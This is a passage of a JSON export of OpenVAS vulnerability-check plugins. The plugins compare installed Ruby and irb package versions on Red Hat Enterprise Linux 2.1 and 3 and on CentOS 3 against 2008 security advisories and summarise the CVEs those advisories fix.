script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"RedHat Update for ruby RHSA-2008:0895-02\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_2.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": 
"2018-04-09T11:41:49", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870086", "id": "OPENVAS:1361412562310870086", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0895-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0895-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS (Advanced Server) version 2.1,\n Red Hat Enterprise Linux ES version 2.1,\n Red Hat Enterprise Linux WS version 2.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00010.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870086\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"RedHat Update for ruby RHSA-2008:0895-02\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = 
\"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_2.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:15", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880056", "id": "OPENVAS:880056", "title": "CentOS Update for irb CESA-2008:0896 centos3 x86_64", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 
Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\");\n script_id(880056);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 x86_64\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:56:40", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870065", "id": "OPENVAS:870065", "title": "RedHat Update for ruby RHSA-2008:0896-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0896-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program 
is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00011.html\");\n script_id(870065);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0896-01\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"RedHat Update for ruby RHSA-2008:0896-01\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release 
== \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:03", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880190", "id": "OPENVAS:880190", "title": "CentOS Update for irb CESA-2008:0896 centos3 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 
Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\");\n script_id(880190);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 i386\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:21", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870065", "id": "OPENVAS:1361412562310870065", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0896-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0896-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00011.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870065\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0896-01\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"RedHat Update for ruby RHSA-2008:0896-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = 
\"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:54", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880056", "id": "OPENVAS:1361412562310880056", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0896 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 
x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. 